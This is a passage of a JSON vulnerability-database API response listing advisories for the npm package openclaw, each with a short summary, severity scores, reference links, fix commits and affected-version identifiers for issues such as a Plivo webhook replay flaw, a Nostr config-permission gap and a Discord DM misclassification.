2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `85777e726c` (`Voice Call: canonicalize Plivo V3 replay key`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41395","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05113","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05091","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05098","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41395"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/85777e726cb02c01a911b3ff832ddf4d664d5c94","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/85777e726cb02c01a911b3ff832ddf4d664d5c94"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8689-gm9g-jgr6","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:20:49Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8689-gm9g-jgr6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41395","reference_id":"CVE-2026-41395","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41395"},{"reference_url":"https://github.com/advisories/GHSA-8689-gm9g-jgr6","reference_id":"GHSA-8689-gm9g-jgr6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8689-gm9g-jgr6"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3","reference_id":"openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:20:49Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41395","GHSA-8689-gm9g-jgr6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bzw7-yvu2-yqa2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89505?format=json","vulnerability_id":"VCID-c25h-khws-2fc3","summary":"OpenClaw: Nostr profile mutation routes allowed operator.write config persistence\n## Summary\n\nNostr profile mutation routes allowed operator.write config persistence.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nNostr plugin HTTP profile routes could persist profile config through a path that did not require admin authority.\n\n## Technical Details\n\nThe fix requires `operator.admin` scope for Nostr profile mutation routes.\n\n## Fix\n\nThe issue was fixed in #63553. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `6517c700de9bb0ee11b41ab625ef3b63d01b6083`\n- PR: #63553\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63553","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63553"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f3h5-h452-vp3j","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f3h5-h452-vp3j"},{"reference_url":"https://github.com/advisories/GHSA-f3h5-h452-vp3j","reference_id":"GHSA-f3h5-h452-vp3j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f3h5-h452-vp3j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["GHSA-f3h5-h452-vp3j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-c25h-khws-2fc3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89835?format=json","vulnerability_id":"VCID-c4yt-z48z-zygv","summary":"OpenClaw: Discord Component Interaction Misclassifies Group DM as Direct Message\n## Summary\nDiscord Component Interaction Misclassifies Group DM as Direct Message\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Real on shipped v2026.3.24 component-interaction routing/auth in extensions/discord/src/monitor/agent-components-helpers.ts, but impact is limited to Group DM policy or session misclassification.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8c83128fc38d5a3642b8ccbea58550755fdbbbaf` — 2026-03-30T11:17:53-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41341","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.051","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05106","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05121","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41341"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8c83128fc38d5a3642b8ccbea58550755fdbbbaf","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8c83128fc38d5a3642b8ccbea58550755fdbbbaf"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6336-qqw9-v6x6","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6336-qqw9-v6x6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41341","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41341"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-component-interaction-misclassification-in-discord-extension","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-component-interaction-misclassification-in-discord-extension"},{"reference_url":"https://github.com/advisories/GHSA-6336-qqw9-v6x6","reference_id":"GHSA-6336-qqw9-v6x6","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6336-qqw9-v6x6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41341","GHSA-6336-qqw9-v6x6"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-c4yt-z48z-zygv"},{"url":"http://public2.vulnerablecode.io/api/vulnerab